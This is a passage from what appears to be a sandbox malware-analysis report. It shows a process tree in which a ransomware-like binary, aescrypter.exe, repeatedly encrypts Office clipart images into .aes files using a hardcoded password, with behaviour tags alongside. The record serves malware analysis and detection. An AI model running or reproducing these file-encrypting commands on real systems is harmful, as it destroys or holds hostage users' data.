  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2676
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178459.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:768
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1740
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2140
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2092
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178639.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2076
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178932.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2992
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0179963.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1920
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2244
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:340
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1712
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1052
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1092
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227558.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:448
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2912
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1952
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287643.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1868
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2508
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1836
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2128
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2064
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309567.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2688
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309585.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:924
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309598.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2428
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309664.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2324
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2964
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3052
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313965.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1872
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313970.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2884
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2756
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2804
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2896
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1896
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2096
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2672
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2056
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2376
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341439.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1960
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341448.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1956
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:560
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2920
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2796
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2924
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2788
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1744
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341557.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1536
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2996
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2192
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:884
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341636.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3016
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3040
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2112
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2040
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341738.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1772
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341742.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2520
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382836.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:824
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1016
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1608
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382927.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2704
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1912
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2424
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:268
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2500
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2576
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382944.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:376
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2452
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2488
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3064
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382952.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1552
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382954.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2064
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2688
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1936
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2316
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382959.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1916
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2080
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1900
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2960
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382963.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1876
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382965.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2764
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2956
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382967.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2628
- C:\ProgramData\local\aescrypter.exe
